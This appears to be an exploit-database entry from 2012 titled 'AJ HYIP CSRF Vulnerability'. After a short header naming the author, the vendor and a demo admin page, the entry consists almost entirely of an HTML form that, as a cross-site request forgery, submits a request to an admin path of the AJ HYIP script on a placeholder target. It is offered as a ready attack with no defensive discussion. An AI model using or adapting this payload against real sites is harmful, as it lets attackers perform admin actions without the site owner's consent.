id: 17838
date: 03/26/2012
title: AJ HYIP CSRF Vulnerability
author: Jonturk75
cves: 

# Exploit Title: AJ HYIP CSRF
# Author: Jonturk75
# Vendor or Software Link: http://www.scripts.com/viewscript/aj-hyip-advanced-latest-hyip-script/18816/
# Category::  webapps
# Demo : http://www.ajhyip.com/demo/meridian/admin/index.php
# Greetz: Inj3ct0r Exploit DataBase 1337day.com

<form name="frm" method="post" action="target.com/admin/[PATH]" enctype="multipart/form-data">
<input name="txtName[]" class="text" value="admin@ajsquare.com" style="width: 180px; height: 20px;" type="text">
<input name="submit" value="Submit" class="button" type="submit">
</form>



#  0day.today [2023-03-24]  #